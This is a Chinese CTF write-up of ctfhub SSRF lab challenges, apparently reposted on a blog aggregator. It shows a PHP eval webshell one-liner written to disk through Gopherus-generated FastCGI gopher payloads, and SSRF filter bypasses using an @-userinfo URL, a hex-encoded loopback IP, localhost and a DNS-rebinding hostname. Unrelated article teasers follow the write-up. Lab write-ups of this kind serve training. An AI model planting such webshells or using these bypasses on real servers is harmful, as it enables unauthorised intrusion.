ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass)

news2024/12/23 2:07:57

less-6  FastCGI协议

步骤一:开启环境,查看提示

步骤二:对一句话木马进行base64编码:<?php @eval($_POST[cmd]);?>

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php

步骤三:利用kali,使用Gopherus工具生成payload:

python2 '/home/kali/Desktop/Gopherus/gopherus.py' --exploit fastcgi

/var/www/html/index.php

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 1.php

步骤四:对所生成进行url编码

步骤五:添加到?url=

访问木马程序

步骤六:利用中国菜刀进行连接

找寻flag

显示提交成功

less-7  Redis协议

步骤一:开启环境,查看提示

步骤三:利用kali,使用Gopherus工具生成payload:

利用url进行编码

添加?url=

访问shell.php

利用中国菜刀进行连接

找到flag

显示提交成功

less-8  URL Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

url=http://notfound.ctfhub.com@127.0.0.1/flag.php

显示提交成功

less-9  数字IP Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

进行进制转换,.换成0

输入:url=http://0x7f000001/flag.php

显示提交成功

less-10  302跳转 Bypass

步骤一:开启环境,查看提示

访问url=http://127.0.0.1/flag.php

url=localhost/flag.php

显示提交成功

less-11  DNS重绑定 Bypass

步骤一:开启环境,查看提示

打开题目附件

rbndr.us dns rebinding service (cmpxchg8b.com)

url=http://7f000001.7f000002.rbndr.us/flag.php

显示提交成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2082643.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

#C++ 笔记一

重点&#xff1a;面试考试大概率会涉及&#xff0c;需要不借助任何资料掌握。 掌握&#xff1a;面试考试可能涉及&#xff0c;需要不借助任何资料掌握 熟悉&#xff1a;面试考试可能涉及&#xff0c;可以稍微参考资料掌握 了解&#xff1a;面试考试小概率涉及&#xff0c;能吹吹…

获取文件属性/库Lib

获取文件属性 stat 函数 man 2 stat #include <sys/types.h> #include <sys/stat.h> #include <unistd.h>int stat(const char *path, struct stat *buf); 功能&#xff1a;获取文件属性 参数&#xff1a; path&#xff1a;文件路径名buf&#xff1a;保存文…

最新黑名单查询录入系统_全开源源码

最新黑名单查询录入系统_全开源源码 前端html 后端layui 操作部分都采用API接口的方式实线 集结了layui表格的多数据操作&#xff0c;添加&#xff0c;批量删除&#xff0c;分页&#xff0c;单项删除 后台数据修改采用绑定参数的形式来进行修改可以很好的预防数据库注入…

【Python入门】第3节 循环语句

&#x1f4d6;第3节 循环语句 ✅while循环的基础语法✅while循环的嵌套✅while循环的嵌套案例✅for循环的基础语法&#x1f9ca;基础语法&#x1f9ca;range语句&#x1f9ca;变量作用域 ✅for循环的嵌套应用✅循环中断 : break和continue ✅while循环的基础语法 只要条件满足…

Thread的属性和方法及如何中断一个线程

文章目录 一. Thread提供的属性和方法1. Thread常见的构造方法2. 属性及获取方法 二. 中断(终止)一个线程1) 自己来实现控制线程结束的例子2) 使用Thread提供的interrupt和isInterrupted方法来实现控制线程结束 一. Thread提供的属性和方法 1. Thread常见的构造方法 ③ 在创建…

戏曲多多 v1.0.4 — 专为老年人打造的戏曲娱乐软件(含经典评书与广场舞)

戏曲多多 TV 是一款专为老年人量身打造的视频娱乐软件&#xff0c;安装在智能电视、智能机顶盒、投影仪等安卓系统设备上后&#xff0c;老年人可以在电视上轻松观看各种戏曲视频。软件涵盖豫剧、京剧、秦腔、越剧、昆曲、淮剧、川剧、黄梅戏等多种戏曲类型。除了戏曲&#xff0…

Java设计模式之原型模式详细讲解和案例示范

引言 在软件设计中&#xff0c;设计模式为我们提供了可复用的解决方案&#xff0c;以应对常见的设计问题。原型模式&#xff08;Prototype Pattern&#xff09;是创建型设计模式的一种&#xff0c;它允许通过复制现有对象来创建新对象&#xff0c;而不需要了解创建过程的细节。…

【软件】常用软件教程一:码云(Gitee)使用方法

文章目录 一、简介二、创建远程仓库三、配置SSH公钥四、同步 Gitee 仓库内容到本地五、本地新建文件并同步至 Gitee六、删除远程仓库中的指定文件七、常见代码 一、简介 Git 是一种分布式版本控制系统&#xff0c;用于跟踪和管理代码的变更。它是由 Linus Torvalds 创建的&…

ctfhub-web-SSRF(内网访问-上传文件)

www.ctfhub.com less-1 内网访问 步骤一&#xff1a;开启环境&#xff0c;查看提示 步骤二&#xff1a;输入urlhttp://127.0.0.1/flag.php 得出结果 显示提交成功 less-2 伪协议读取文件 步骤一&#xff1a;开启环境&#xff0c;查看提示 步骤二&#xff1a;输入urlfile://…

英伟达财报引爆AI投资狂潮?华尔街众说纷纭

英伟达&#xff0c;这个名字最近可是火爆了整个科技圈。作为全球最大的GPU供应商&#xff0c;英伟达的每一次动作都牵动着无数投资者的神经。尤其是即将到来的财报发布&#xff0c;更是让市场充满了期待和忐忑。 华尔街聚焦&#xff1a;AI巨头能否持续高增长&#xff1f; 整个…

背完这些软件测试核心面试题,offer轻松拿捏了!

你赞同过 软件测试和开发 相关内容 01、您所熟悉的测试用例设计方法都有哪些&#xff1f;请分别以具体的例子来说明这些方法在测试用例设计工作中的应用。 答&#xff1a;有黑盒和白盒两种测试种类&#xff0c;黑盒有等价类划分法&#xff0c;边界分析法&#xff0c;因果图法…

NVDA财报公布在即,港股围观情绪明显

港股上午盘三大指数低开低走&#xff0c;恒生科技指数一度大跌1.59%&#xff0c;恒指再度失守17800点。盘面上&#xff0c;大型科技股全线下跌令大市承压&#xff0c;百度跌超3%&#xff0c;网易、美团跌超2%&#xff0c;腾讯、快手、阿里巴巴跌超1%&#xff1b;多家房企宣布营…

Git学习(001 git介绍以及安装)

尚硅谷2024最新Git企业实战教程&#xff0c;全方位学习git与gitlab 总时长 5:42:00 共40P 此文章包含第1p-第p4的内容 文章目录 介绍Git介绍GitLab介绍 概述Git安装版本控制工具介绍 介绍 Git介绍 GitLab介绍 相当于中央仓库 概述 Git安装 进入官网(下载当前版本 2.43.0) …

JavaScript ES6+ 新特性

JavaScript ES6 新特性 引言 随着前端技术的不断发展&#xff0c;JavaScript 语言也在不断演进。自 ES6&#xff08;ES2015&#xff09;发布以来&#xff0c;JavaScript 引入了许多新的特性和语法&#xff0c;极大地提升了开发者的编程体验和代码的可维护性。本篇文章将详细探…

测试必备--轻松掌握弱网测试技巧

在如今的移动互联网时代,用户对应用的依赖性越来越强。然而,网络环境并非总是理想的,特别是在信号较弱或网络不稳定的情况下,应用的表现尤为重要。你是否曾遇到过这样的情况:在地铁、地下停车场或者偏远地区,网络信号减弱,应用频繁卡顿甚至崩溃?为了确保用户在弱网环境…

JS WebSocket 深度解析

JS WebSocket 深度解析 文章目录 JavaScript WebSocket 深度解析一、WebSocket 是什么二、JS 中如何使用 WebSocket1. 创建 WebSocket 对象2. 连接打开事件3. 监听消息事件4. 监听错误事件5. 关闭连接 三、WebSocket 包含哪些属性或方法 API1. 属性2. 方法 四、扩展与高级技巧1…

微分方程(Blanchard Differential Equations 4th)中文版Section4.5

塔科马海峡大桥 1940年7月1日,耗资600万美元的塔科马海峡大桥正式通车。仅仅四个月后的11月7日,在一场风暴中,这座桥解体并倒塌。这座悬索桥全长超过一英里,曾在它短暂的使用期内因桥面在风中剧烈摆动而被称为“跳跃的格蒂”(Galloping Gertie)。大桥的倒塌不仅成为一场…

KAN+Transformer,一个快速发论文的新创新点!

KAN爆火至今&#xff0c;关于它和Transformer谁更强的问题还没定论&#xff0c;这俩结合的工作效果却愈发出众了&#xff0c;短时间内就有了不少高质量论文发表。 不得不说&#xff0c;这是一种富有创新性的尝试&#xff0c;利用了KAN的灵活性和可解释性&#xff0c;以及Trans…

ocr识别遇到的问题(nested exception is java.lang.UnsatisfiedLinkError)

目录 前言&#xff1a; 问题描述&#xff1a; 解决思路&#xff1a; 解决方法&#xff1a; 总结反思&#xff1a; 前言&#xff1a; 上篇讲过我使用冰蓝的jar包在Java 项目中扫描识别图片中的文字&#xff0c;这篇写更新上线中遇到的问题。 问题描述&#xff1a; 项目打…

c++习题26-大整数加法

目录 一&#xff0c;题目 二&#xff0c;思路 三&#xff0c;代码 一&#xff0c;题目 描述 求两个不超过200位的非负整数的和。 输入 有两行&#xff0c;每行是一个不超过200位的非负整数&#xff0c;可能有多余的前导0。 输出 一行&#xff0c;即相加后的结果。结果里不…